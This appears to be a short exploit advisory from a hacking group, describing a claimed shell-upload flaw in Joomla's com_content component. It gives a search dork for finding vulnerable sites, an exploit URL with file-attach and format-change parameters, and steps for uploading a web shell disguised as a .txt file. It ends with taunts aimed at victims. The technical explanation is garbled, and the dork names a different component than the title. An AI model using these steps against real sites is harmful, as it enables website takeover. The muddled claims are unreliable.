[ Joomla com_content Shell Upload Vulnerability]
     
    [x] Author : Agd_Scorp
    [x] Home : www.turkguvenligi.info (former)
    [x] E-mail : vorscorp@hotmail.com
    [x] Found : Mon, Dec 24, 2012
    [x] Tested : Windows 7, Ubuntu, Gentoo
    [x] Dork : inurl:"/index.php?option=com_bch"
    ________________________________________________________________
    ****************************************************************

    [x] The Conlusion
    The vulnerability resides at 'cont' parameter, which is often used for reconnecting the SQL database to the website in-order to gain information that is being provided by the administrator, although, if a few parameters are added as an extention-act, files can be uploaded, and therefore, more risk shall occur.
     
    [x] Vuln Exploit Report:
    http://localhost/index.php?option=com_content&cont=sendfile?controller&attach_file=[FILE LINK]&chformat=php (or any other you want it to change into)

    [x] Uploading a Shell
    First, change your shell's format into .txt, then extract into that, when uploaded, and chformat parameter is added, it will be automatically be changed into *.php, therefore, your shell is spawned.

     
    [x] Note:
    h4ck y0u...
    kill y0u...
    0wn y0u....
     
    - TURKGUVENLIGI -